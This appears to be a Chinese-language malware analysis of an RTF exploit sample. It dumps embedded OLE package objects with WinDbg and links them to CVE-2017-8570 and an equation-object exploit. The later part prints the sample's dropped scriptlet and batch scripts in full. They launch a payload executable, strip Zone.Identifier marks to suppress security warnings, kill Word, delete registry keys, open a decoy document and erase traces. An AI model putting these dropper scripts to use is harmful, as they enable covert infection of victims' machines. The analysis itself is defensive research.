up777

1.样本信息

样本是在www.reverse.it上找的,基本信息如下.

混淆情况

可以看到,样本被混淆得很厉害(虽然卡巴还没拖进去就被杀了),对我们分析样本造成了一定的阻碍

windbg加载winword

bp ole32!OleConvertOLESTREAMToIStorage

然后断网,将rtf拖入winword中

ole32!OleConvertOLESTREAMToIStorage:
77a028fa 8bff            mov     edi,edi
断下来了

 

0:000> kb
ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 043138d4 05490100 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.
00164f40 69fc827c 042ba000 043138d4 00000001 wwlib!DllCanUnloadNow+0xadec
00164f80 6997c4e8 042ba000 04310980 00164fec wwlib!DllCanUnloadNow+0x299f3a
0:000> dc 043138d4 l4
043138d4  6a2c78ec 00000001 01bf00e4 0000037d  .x,j........}...

0:000> db poi(01bf00e4) l37d
03c47e58  01 05 00 00 02 00 00 00-08 00 00 00 50 61 63 6b  ............Pack
03c47e68  61 67 65 00 00 00 00 00-00 00 00 00 55 03 00 00  age.........U...
03c47e78  02 00 6c 6f 6e 67 69 6e-74 65 72 63 6f 6e 73 74  ..longinterconst
03c47e88  61 2e 53 63 54 00 43 3a-5c 49 6e 74 65 6c 5c 6c  a.ScT.C:\Intel\l
03c47e98  6f 6e 67 69 6e 74 65 72-63 6f 6e 73 74 61 2e 53  onginterconsta.S
03c47ea8  63 54 00 00 00 03 00 1d-00 00 00 43 3a 5c 49 6e  cT.........C:\In
03c47eb8  74 65 6c 5c 6c 6f 6e 67-69 6e 74 65 72 63 6f 6e  tel\longintercon
03c47ec8  73 74 61 2e 53 63 54 00-57 02 00 00 3c 3f 58 4d  sta.ScT.W...<?XM

第一个对象是package

0:000> .writemem c:\1.package poi(01bf00e4) l37d
Writing 37d bytes.

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 05490068 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.
00164f40 69fc827c 042ba000 04313b9c 00000001 wwlib!DllCanUnloadNow+0xadec
00164f80 6997c4e8 042ba000 04310980 00164fec wwlib!DllCanUnloadNow+0x299f3a

0:000> dd 04313b9c l4

04313b9c  6a2c78ec 00000001 01bf00dc 00000264

0:000> dc poi(01bf00dc) l264

03c87e78  00000501 00000002 00000008 6b636150  ............Pack
03c87e88  00656761 00000000 00000000 0000023c  age.........<...
03c87e98  6f670002 2e69646e 00636f64 495c3a43  ..gondi.doc.C:\I
03c87ea8  6c65746e 6e6f675c 642e6964 0000636f  ntel\gondi.doc..

0:000> .writemem c:\2.package poi(01bf00dc) l264

Writing 264 bytes

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 05495888 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.
00164f40 69fc827c 042ba000 04313b9c 00000001 wwlib!DllCanUnloadNow+0xadec
00164f80 6997c4e8 042ba000 04310980 00164fec wwlib!DllCanUnloadNow+0x299f3a

0:000> dd 04313b9c l4

04313b9c  6a2c78ec 00000001 01bf00dc 0005e2cb

0:000> dc poi(01bf00dc)

05290020  00000501 00000002 00000008 6b636150  ............Pack
05290030  00656761 00000000 00000000 0005e2a3  age.............
05290040  6f6d0002 2e69646e 00657865 495c3a43  ..mondi.exe.C:\I
05290050  6c65746e 6e6f6d5c 652e6964 00006578  ntel\mondi.exe..
05290060  13000300 43000000 6e495c3a 5c6c6574  .......C:\Intel\
05290070  646e6f6d 78652e69 e1ff0065 5a4d0005  mondi.exe.....MZ
05290080  00030090 00040000 ffff0000 00b80000  ................
05290090  00000000 00400000 00000000 00000000  ......@.........

0:000> .writemem c:\3.package poi(01bf00dc) l5e2cb

Writing 5e2cb bytes..............

0:000> g

Breakpoint 0 hit
eax=000004e8 ebx=042cf3c0 ecx=00008000 edx=00000000 esi=05490960 edi=00164f78
eip=77a028fa esp=00164cbc ebp=00164f40 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
ole32!OleConvertOLESTREAMToIStorage:
77a028fa 8bff            mov     edi,edi

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 054957f0 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.

0:000> dd 04313b9c

04313b9c  6a2c78ec 00000001 01bf00dc 0000017e
04313bac  00040010 00000002 00000000 00000000
04313bbc  00000000 00000000 00000000 00000000
04313bcc  00000000 00000000 00000000 00000000
04313bdc  00000000 00000000 00000000 00000000
04313bec  00000000 00000000 00000000 00000000
04313bfc  00000000 00000000 00000000 00000000
04313c0c  00000000 00000000 00000000 00000000

0:000> dc poi(01bf00dc)

03c87e78  00000501 00000002 00000008 6b636150  ............Pack
03c87e88  00656761 00000000 00000000 00000156  age.........V...
03c87e98  6e690002 632e6964 4300646d 6e495c3a  ..indi.cmd.C:\In
03c87ea8  5c6c6574 69646e69 646d632e 03000000  tel\indi.cmd....
03c87eb8  00001200 5c3a4300 65746e49 6e695c6c  .....C:\Intel\in
03c87ec8  632e6964 bb00646d 45000000 204f4843  di.cmd.....ECHO
03c87ed8  0d46464f 7465730a 6c6e7520 3d6b636f  OFF..set unlock=
03c87ee8  6d742522 0d222570 7465730a 636f6c20  "%tmp%"..set loc

0:000> .writemem c:\4.package poi(01bf00dc) l17e

Writing 17e bytes.

0:000> g

Breakpoint 0 hit
eax=000004e8 ebx=042dabe0 ecx=00008000 edx=00000000 esi=05490960 edi=00164f78
eip=77a028fa esp=00164cbc ebp=00164f40 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
ole32!OleConvertOLESTREAMToIStorage:
77a028fa 8bff            mov     edi,edi

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 054966f0 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.

0:000> dd 04313b9c

04313b9c  6a2c78ec 00000001 01bf00dc 00000314
04313bac  00040010 00000002 00000000 00000000
04313bbc  00000000 00000000 00000000 00000000
04313bcc  00000000 00000000 00000000 00000000
04313bdc  00000000 00000000 00000000 00000000
04313bec  00000000 00000000 00000000 00000000
04313bfc  00000000 00000000 00000000 00000000
04313c0c  00000000 00000000 00000000 00000000

0:000> dc poi(01bf00dc)

03c87e78  00000501 00000002 00000008 6b636150  ............Pack
03c87e88  00656761 00000000 00000000 000002ec  age.............
03c87e98  6f680002 2e69646e 00646d63 495c3a43  ..hondi.cmd.C:\I
03c87ea8  6c65746e 6e6f685c 632e6964 0000646d  ntel\hondi.cmd..
03c87eb8  13000300 43000000 6e495c3a 5c6c6574  .......C:\Intel\
03c87ec8  646e6f68 6d632e69 02480064 43450000  hondi.cmd.H...EC
03c87ed8  4f204f48 0a0d4646 454d4954 2054554f  HO OFF..TIMEOUT
03c87ee8  0a0d2031 20746573 70704122 6e69773d  1 ..set "App=win

0:000> .writemem c:\5.package poi(01bf00dc) l314

Writing 314 bytes.

0:000> g

Breakpoint 0 hit
eax=000004e8 ebx=042dab40 ecx=00008000 edx=00000000 esi=05490960 edi=00164f78
eip=77a028fa esp=00164cbc ebp=00164f40 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
ole32!OleConvertOLESTREAMToIStorage:
77a028fa 8bff            mov     edi,edi

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 05496388 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.

0:000> dd 04313b9c

04313b9c  6a2c78ec 00000001 01bf00dc 00000a49
04313bac  00040010 00000002 00000000 00000000
04313bbc  00000000 00000000 00000000 00000000
04313bcc  00000000 00000000 00000000 00000000
04313bdc  00000000 00000000 00000000 00000000
04313bec  00000000 00000000 00000000 00000000
04313bfc  00000000 00000000 00000000 00000000
04313c0c  00000000 00000000 00000000 00000000

0:000> dc poi(01bf00dc)

03c87e78  00000000 00000002 00000009 32454c4f  ............OLE2
03c87e88  6b6e694c 00000000 00000000 000a0000  Link............
03c87e98  11cfd000 1ab1a1e0 000000e1 00000000  ................
03c87ea8  00000000 00000000 03003e00 09fffe00  .........>......
03c87eb8  00000600 00000000 00000000 00000100  ................
03c87ec8  00000100 00000000 00100000 00000200  ................
03c87ed8  00000100 fffffe00 000000ff 00000000  ................
03c87ee8  ffffff00 ffffffff ffffffff ffffffff  ................

0:000> .writemem c:\6olelink poi(01bf00dc) la49

Writing a49 bytes..

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 05497f90 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.
0:000> dd 04313b9c
04313b9c  6a2c78ec 00000001 01bf00dc 0000124a
04313bac  00040010 00000002 00000000 00000000
04313bbc  00000000 00000000 00000000 00000000
04313bcc  00000000 00000000 00000000 00000000
04313bdc  00000000 00000000 00000000 00000000
04313bec  00000000 00000000 00000000 00000000
04313bfc  00000000 00000000 00000000 00000000
04313c0c  00000000 00000000 00000000 00000000
0:000> dc poi(01bf00dc)
03ccae98  b1a0b139 00000002 0000000b 41757145  9...........EquA
03ccaea8  6e6f6954 0000322e 00000000 00000000  Tion.2..........
03ccaeb8  d000000e a1e011cf 00e11ab1 00000000  ................
03ccaec8  00000000 00000000 3e000000 fe000300  ...........>....
03ccaed8  060009ff 00000000 00000000 01000000  ................
03ccaee8  01000000 00000000 00000000 02000010  ................
03ccaef8  01000000 fe000000 00ffffff 00000000  ................
03ccaf08  ff000000 ffffffff ffffffff ffffffff  ................
0:000> .writemem c:\7equation poi(01bf00dc) l124a
Writing 124a bytes...

之后word就正常运行了

按顺序就是:,这里顺序很重要,比如把6或7放前面就不对了

word运行起来后tmp目录下的文件

可以看到里面的文件除了mondi.exe,其余的并不是和上面分析的出的package一致,比如indi.cmd就没有出现,很可能是被删除了

这里大概猜测这个rtf实际上是包含了CVE-2017-8570和公式对象两个漏洞利用模块

主要是5个package和2个漏洞利用对象

5个package在这个漏洞的作用就是将文件释放到tmp目录

2个漏洞利用对象就是"运行"释放的package,可以看到rtf中有2个objupdate,这就是他们自动运行的原因

参考:https://github.com/rxwx/CVE-2017-8570/blob/master/example.rtf

longinterconsta.ScT 内容如下,其作用就是运行tmp目录的indi.cmd,和下面的公式对象作用相同

<?XML version="1.0"?>
<scriptlet>

<registration
    description="indaclub"
    progid="indaclub"
    version="1.00"
    classid="{204774CF-D251-4F02-855B-2BE70585184B}"
    remotable="true"
    >
</registration>

<script><![CDATA[
        var dq='"';
        var KfXhbf="C";
        var a2 ="t";
        var w1="<";
        var xc=KfXhbf+"mD ";
        var xy= xc + "/" + KfXhbf + " " + xc + w1 + " " + dq + "%" + a2 + "eMP%\\i" + "ndi.cmd" + dq;
        var x2='ipt';
        var x1='WScr';
        var x4='ll';
        var x3='She';
        var r = new ActiveXObject(x1 + x2 + "." + x3 + x4); 
        r.Run(xy, 0, 1);]]>
</script>

</scriptlet>

ECHO OFF
set unlock="%tmp%"
set lock="\blOcK.txt"
IF EXIST %unlock%%lock% (exit) ELSE (copy NUL %unlock%%lock% & type NUL > %temp%\hondi.cmd:Zone.Identifier & start /b %tmp%\hondi.cmd)

ECHO OFF
TIMEOUT 1
set "App=winword.exe"
set "m1=HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\"
set "m2=.0\Word\File MRU"
set "m3=.0\Word\Resiliency"
type NUL > %tMp%\mondi.eXe:Zone.Identifier     关闭安全警告
type NUL > %tmp%\gondi.doc:Zone.Identifier    关闭安全警告
start %teMp%\mondi.eXe                                    运行 mondi.eXe
TASKKILL /F /IM %App%                                    结束word.exe进程
for /l %%i in (11,1,16) do (                                     word相关的注册表操作,关闭word安全警告

reg delete %m1%%%i%m3% /f
for /f "tokens=1* delims=\*" %%a in ('REG QUERY "%m1%%%i%m2%" /v "Item 1"') do set "Nodeblan=%%~b"
)
copy %tmp%\gondi.dOc "%Maverick%"               
"%Maverick%"                                                           运行 word,打开gondi.dOc(一个正常文档),这样就会造成一种假象(虽然实际情况是上面关了word.exe,就没再起来)

del %tmp%\longinterconsta.sct   
del %tmp%\gondi.doc
del %tmp%\indi.cmd
del "%~0"